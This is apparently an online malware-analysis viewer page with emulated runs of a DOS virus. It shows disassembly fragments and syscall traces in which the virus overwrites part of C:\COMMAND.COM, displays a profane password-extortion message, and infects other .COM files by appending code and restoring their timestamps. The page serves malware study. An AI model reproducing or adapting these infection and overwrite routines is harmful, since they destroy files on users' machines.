Sample viewer

vx.netlux.org/Virus.DOS.MutaGen.100.Secret.2094

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:19:04.841622262Z 42 PC: 12a50 | Get date 0x12a50: cmp dl, 0x11
0x12a53: jne 0x12aae
0x12a55: mov ax, 0x4301
0x12a58: mov cx, 0x20
0x12a5b: lea dx, word ptr [bp + 0x2a5]
0x12a5f: int 0x21
0x12a61: mov ax, 0x3d02
0x12a64: lea dx, word ptr [bp + 0x2a5]
0x12a68: int 0x21
0x12a6a: mov bx, ax
0x12a6c: mov ah, 0x40
0x12a6e: mov cx, 0x12
0x12a71: lea dx, word ptr [bp + 0x15c]
0x12a75: int 0x21
0x12a77: mov ah, 2
0x12a79: mov bh, 0
0x12a7b: mov dx, 0
0x12a7e: int 0x10
0x12a80: mov ah, 9
0x12a82: lea dx, word ptr [bp + 0x305]
2018-12-17T22:19:04.844502596Z 67 PC: 12a61 | Get or set file attributes
2018-12-17T22:19:05.185069141Z 61 PC: 12a6a | Open file (Filename = 'C:\COMMAND.COM')
2018-12-17T22:19:05.192030669Z 64 PC: 12a77 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:19:05.19642066Z 9 PC: 12a88 | Display string (String= 'I AM GOING TO FUCK YOUR HARD DISK IF YOU DON'T TYPE THE RIGHT PASSWORD. DON'T TURN OFF YOUR COMPUTER BECAUSE I ALREADY FUCKED YOUR HARD DISK AND I WILL FIX IT ONLY IF YOU ENTER THE RIGHT PASSWORD!!! PASSWORD IS:')
2018-12-17T22:19:05.201133185Z 12 PC: 12a8e | Flush input buffer and input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3283,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:45.797692861Z 42 PC: 12a50 | Get date 0x12a50: cmp dl, 0x11
0x12a53: jne 0x12aae
0x12a55: mov ax, 0x4301
0x12a58: mov cx, 0x20
0x12a5b: lea dx, word ptr [bp + 0x2a5]
0x12a5f: int 0x21
0x12a61: mov ax, 0x3d02
0x12a64: lea dx, word ptr [bp + 0x2a5]
0x12a68: int 0x21
0x12a6a: mov bx, ax
0x12a6c: mov ah, 0x40
0x12a6e: mov cx, 0x12
0x12a71: lea dx, word ptr [bp + 0x15c]
0x12a75: int 0x21
0x12a77: mov ah, 2
0x12a79: mov bh, 0
0x12a7b: mov dx, 0
0x12a7e: int 0x10
0x12a80: mov ah, 9
0x12a82: lea dx, word ptr [bp + 0x305]
2018-12-25T11:48:45.800217365Z 71 PC: 12ab8 | Get current directory
2018-12-25T11:48:45.804535694Z 26 PC: 12ac0 | Set disk transfer address
2018-12-25T11:48:45.806379087Z 78 PC: 12b00 | Find first file
2018-12-25T11:48:45.828233701Z 67 PC: 12b1e | Get or set file attributes
2018-12-25T11:48:45.834442801Z 67 PC: 12b2a | Get or set file attributes
2018-12-25T11:48:45.852348612Z 61 PC: 12b33 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:45.861108943Z 63 PC: 12b40 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:48:45.868078884Z 66 PC: 12b48 | Move file pointer
2018-12-25T11:48:45.869537665Z 87 PC: 12b7b | Get or set file date and time
2018-12-25T11:48:45.873850762Z 64 PC: 12ba2 | Write file or device (Write 986 bytes on handle 5)
2018-12-25T11:48:45.884090787Z 66 PC: 12baa | Move file pointer
2018-12-25T11:48:45.886315818Z 64 PC: 12bb5 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:45.89385632Z 87 PC: 12bc2 | Get or set file date and time
2018-12-25T11:48:45.895587714Z 62 PC: 12bca | Close file
2018-12-25T11:48:45.904508633Z 67 PC: 12bd7 | Get or set file attributes
2018-12-25T11:48:45.915189258Z 79 PC: 12b00 | Find next file (See above)
2018-12-25T11:48:45.918537406Z 67 PC: 12b1e | Get or set file attributes (See above)
2018-12-25T11:48:45.924592447Z 67 PC: 12b2a | Get or set file attributes (See above)
2018-12-25T11:48:45.934962173Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:48:45.949108275Z 63 PC: 12b40 | Read file or device (See above)
2018-12-25T11:48:45.955906377Z 66 PC: 12b48 | Move file pointer (See above)
2018-12-25T11:48:45.957275359Z 87 PC: 12b7b | Get or set file date and time (See above)

{"DateBased":true,"Day":17,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3283,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:46.132248408Z 42 PC: 12a50 | Get date 0x12a50: cmp dl, 0x11
0x12a53: jne 0x12aae
0x12a55: mov ax, 0x4301
0x12a58: mov cx, 0x20
0x12a5b: lea dx, word ptr [bp + 0x2a5]
0x12a5f: int 0x21
0x12a61: mov ax, 0x3d02
0x12a64: lea dx, word ptr [bp + 0x2a5]
0x12a68: int 0x21
0x12a6a: mov bx, ax
0x12a6c: mov ah, 0x40
0x12a6e: mov cx, 0x12
0x12a71: lea dx, word ptr [bp + 0x15c]
0x12a75: int 0x21
0x12a77: mov ah, 2
0x12a79: mov bh, 0
0x12a7b: mov dx, 0
0x12a7e: int 0x10
0x12a80: mov ah, 9
0x12a82: lea dx, word ptr [bp + 0x305]
2018-12-25T11:48:46.135133934Z 67 PC: 12a61 | Get or set file attributes
2018-12-25T11:48:46.476899065Z 61 PC: 12a6a | Open file (Filename = 'C:\COMMAND.COM')
2018-12-25T11:48:46.483866657Z 64 PC: 12a77 | Write file or device (Write 18 bytes on handle 5)
2018-12-25T11:48:46.488263981Z 9 PC: 12a88 | Display string (String= 'I AM GOING TO FUCK YOUR HARD DISK IF YOU DON'T TYPE THE RIGHT PASSWORD. DON'T TURN OFF YOUR COMPUTER BECAUSE I ALREADY FUCKED YOUR HARD DISK AND I WILL FIX IT ONLY IF YOU ENTER THE RIGHT PASSWORD!!! PASSWORD IS:')
2018-12-25T11:48:46.494239329Z 12 PC: 12a8e | Flush input buffer and input